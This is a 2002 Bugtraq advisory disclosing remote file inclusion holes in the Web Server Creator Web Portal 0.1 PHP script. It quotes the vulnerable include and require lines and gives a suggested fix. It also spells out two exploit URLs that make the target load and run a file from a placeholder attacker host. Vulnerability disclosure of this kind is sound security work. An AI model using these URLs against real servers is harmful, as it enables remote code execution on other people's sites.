Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Web Server Creator - Web Portal 0.1 (PHP)

From: "Frog Man" <leseulfrog () hotmail com>
Date: Mon, 25 Nov 2002 17:33:41 +0100





Informations :
°°°°°°°°°°°°°°
Website : http://webcreator.com02.com
Tested version : 0.1
Problem : Include file

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
news/include/customize.php :
------------------
<?
$langfile = $l;

include $l;
?>
------------------

index.php :
-----------------------------------
[...]
if (!$pg) { $pg = "acceuil"; }
[...]
require ("$pg.php");
?>
[...]
-----------------------------------

Exploits :
°°°°°°°°°°
http://[target]/news/include/customize.php?l=http://[attacker]/file.txt
with
http://[attacker]/file.txt

and

http://[target]/index.php?pg=http://[attacker]/badfile
with
http://[attacker]/badfile.php



Solution :
°°°°°°°°°°
- Delete bugged lines in news/include/customize.php
- In index.php replce this line :
require ("$pg.php");
by :
-------------------
if (file_exists($pg.".php")){
require ("$pg.php");
}
-------------------

A patch can be found on http://www.phpsecure.org.


More details :
°°°°°°°°°°°°°°
In french :
http://www.frog-man.org/tutos/WSC-WebPortal.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWSC-WebPortal.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII



frog-m@n



_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
Previous By Date Next
Previous By Thread Next

Current thread: